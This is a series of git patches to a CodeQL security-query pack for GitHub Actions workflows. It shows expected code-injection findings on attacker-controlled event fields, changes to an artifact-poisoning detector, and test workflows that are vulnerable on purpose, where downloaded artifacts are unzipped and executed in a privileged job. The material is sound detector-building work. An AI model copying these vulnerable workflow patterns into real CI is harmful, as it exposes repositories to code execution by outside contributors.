| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From f7ddd8b769f64dc375ad140d8f137e3ea3ea822a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:50 +0200 Subject: [PATCH 146/707] Include problem queries in actions-all suite --- ql/src/codeql-suites/actions-all.qls | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 8c0f580a7ade..32b9b5800cd5 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -2,4 +2,5 @@ - queries: . - include: kind: - - path-problem + - problem + - path-problem From ce5928c6bac0a49e245ff88503bb37612909bd16 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:43:43 +0200 Subject: [PATCH 147/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e99a12dda08d..f689f38ef527 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.5 +version: 0.0.6 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e37339e16cbc..f2ce850e5b83 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.5 +version: 0.0.6 groups: - actions - queries From 28ccf4fa68ffb178976a679c7ca62f2fee3b2305 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 09:18:01 +0200 Subject: [PATCH 148/707] Improve Artifact Poisoning query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 9 + .../security/ArtifactPoisoningQuery.qll | 183 ++++++++++++++++-- .../actions/security/EnvVarInjectionQuery.qll | 4 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 13 +- ql/test/library-tests/test.expected | 4 + .../.github/workflows/artifactpoisoning11.yml | 41 ++++ ...poisoning1.yml => artifactpoisoning12.yml} | 10 +- ...poisoning3.yml => artifactpoisoning21.yml} | 10 +- ...poisoning2.yml => artifactpoisoning22.yml} | 2 +- .../.github/workflows/artifactpoisoning31.yml | 22 +++ .../.github/workflows/artifactpoisoning32.yml | 21 ++ .../.github/workflows/artifactpoisoning33.yml | 21 ++ .../.github/workflows/artifactpoisoning41.yml | 25 +++ ...poisoning4.yml => artifactpoisoning42.yml} | 4 +- .../.github/workflows/artifactpoisoning51.yml | 24 +++ .../CWE-829/ArtifactPoisoning.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- 18 files changed, 372 insertions(+), 40 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning1.yml => artifactpoisoning12.yml} (73%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning3.yml => artifactpoisoning21.yml} (51%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning2.yml => artifactpoisoning22.yml} (94%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning4.yml => artifactpoisoning42.yml} (89%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17768245fdca..720fd29feb0f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -225,6 +225,8 @@ class Step extends AstNode instanceof StepImpl { Env getEnv() { result = super.getEnv() } If getIf() { result = super.getIf() } + + Step getAFollowingStep() { result = super.getAFollowingStep() } } /** diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3f9293bc972a..bba5c1a47d34 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -629,6 +629,15 @@ class StepImpl extends AstNodeImpl, TStepNode { /** Gets the value of the `if` field in this step, if any. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets a step that follows this step. */ + StepImpl getAFollowingStep() { + exists(LocalJobImpl job, int i, int j | + job.getStep(i) = this and + result = job.getStep(j) and + i < j + ) + } } class IfImpl extends AstNodeImpl, TIfNode { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index abf36fd7da34..c64a7d0e3383 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -1,13 +1,36 @@ import actions -class ArtifactDownloadStep extends Step { - ArtifactDownloadStep() { +string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } + +string unzipDirArgRegexp() { + result = "-d\\s+\"([^ ]+)\".*" or + result = "-d\\s+'([^ ]+)'.*" +} + +abstract class ArtifactDownloadStep extends Step { + abstract string getPath(); +} + +class Dawidd6ActionDownloadArtifactDownloadStep extends ArtifactDownloadStep, UsesStep { + Dawidd6ActionDownloadArtifactDownloadStep() { // eg: - uses: dawidd6/action-download-artifact@v2 - this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and - // exclude downloads outside the current directory - // TODO: add more checks to make sure the artifacts can be controlled - not exists(this.(UsesStep).getArgumentExpr("path")) - or + this.getCallee() = "dawidd6/action-download-artifact" and + // An attacker should not be able to push to local branches which `branch` normally is used for. + ( + not exists(this.getArgument("branch")) or + not this.getArgument("branch") = ["main", "master"] + ) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + +class ActionsGitHubScriptDownloadStep extends ArtifactDownloadStep, UsesStep { + string script; + + ActionsGitHubScriptDownloadStep() { // eg: // - uses: actions/github-script@v6 // with: @@ -26,16 +49,79 @@ class ArtifactDownloadStep extends Step { // artifact_id: matchArtifact.id, // archive_format: 'zip', // }); - this.(UsesStep).getCallee() = "actions/github-script" and - exists(string script | - this.(UsesStep).getArgument("script") = script and - script.matches("%listWorkflowRunArtifacts(%") and - script.matches("%downloadArtifact(%") + // var fs = require('fs'); + // fs.writeFileSync('${{github.workspace}}/test-results.zip', Buffer.from(download.data)); + this.getCallee() = "actions/github-script" and + this.getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") and + script.matches("%writeFileSync%") + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else + if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + then result = "" + else none() + } +} + +class GHRunArtifactDownloadStep extends ArtifactDownloadStep, Run { + string script; + + GHRunArtifactDownloadStep() { + // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.getScript() = script and + script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and + script.splitAt("\n").matches("%github.event.workflow_run.id%") and + ( + script.splitAt("\n").regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) ) - or - // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") - or + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else + if + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or + script.splitAt("\n").regexpMatch(unzipRegexp()) + then result = "" + else none() + } +} + +class DirectArtifactDownloadStep extends ArtifactDownloadStep, Run { + string script; + + DirectArtifactDownloadStep() { // eg: // run: | // artifacts_url=${{ github.event.workflow_run.artifacts_url }} @@ -45,6 +131,69 @@ class ArtifactDownloadStep extends Step { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") + this.getScript() = script and + script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + ( + script.splitAt("\n").regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + ) + } + + override string getPath() { + if + script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else result = "" + } +} + +abstract class PoisonableStep extends Step { } + +class CommandExecutionRunStep extends PoisonableStep, Run { + CommandExecutionRunStep() { + exists(ArtifactDownloadStep step | + step.getAFollowingStep() = this and + // Heuristic: + // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... + // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... + this.getScript() + .trim() + .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + ) + } +} + +predicate writeToGithubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and + value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) + ) +} + +class EnvVarInjectionRunStep extends PoisonableStep, Run { + EnvVarInjectionRunStep() { + exists(ArtifactDownloadStep step, string value | + step.getAFollowingStep() = this and + // Heuristic: + // Run step with env var definition based on file content. + // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` + writeToGithubEnv(this, _, value) and + value.regexpMatch(".*cat\\s+.*") + ) } } +// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 330920852c1e..a6d7e1b3cca8 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -8,8 +8,8 @@ predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and + value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5d38faa94df5..bd9ec090f7f9 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,13 +14,10 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step where + // Workflow is privileged job.getWorkflow().isPrivileged() and - (run instanceof Run or run instanceof UsesStep) and - exists(int i, int j | - job.getStep(i) = download and - job.getStep(j) = run and - i < j - ) -select download, "Potential artifact poisoning." + // Download step is followed by a step that may be poisoned by the download + downloadStep.getAFollowingStep() = step +select downloadStep, "Potential artifact poisoning." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a8a0414dd9f9..ea353609e249 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -351,6 +351,10 @@ sources | tj-actions/changed-files | * | output.unknown_files | PR changed files | | tj-actions/changed-files | * | output.unmerged_files | PR changed files | | tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| trilom/file-changes-action | * | output.files | PR changed files | +| trilom/file-changes-action | * | output.files_added | PR changed files | +| trilom/file-changes-action | * | output.files_modified | PR changed files | +| trilom/file-changes-action | * | output.files_removed | PR changed files | | tzkhan/pr-update-action | * | output.headMatch | | | xt0rted/slash-command-action | * | output.command-arguments | | summaries diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml new file mode 100644 index 000000000000..f8d3736dba51 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -0,0 +1,41 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip -d sonarcloud-data + ls -a sonarcloud-data + - name: Run command + run: + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml similarity index 73% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index 4755350f0fc8..edcdc3b2064e 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -27,8 +27,14 @@ jobs: artifact_id: matchArtifact.id, archive_format: 'zip', }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip + ls -a sonarcloud-data - name: Run command - run: cmd - + run: + ./x.py build -j$(nproc) --compiler gcc --skip-build diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml similarity index 51% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 4d2a9774753a..2f39bfd307aa 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ 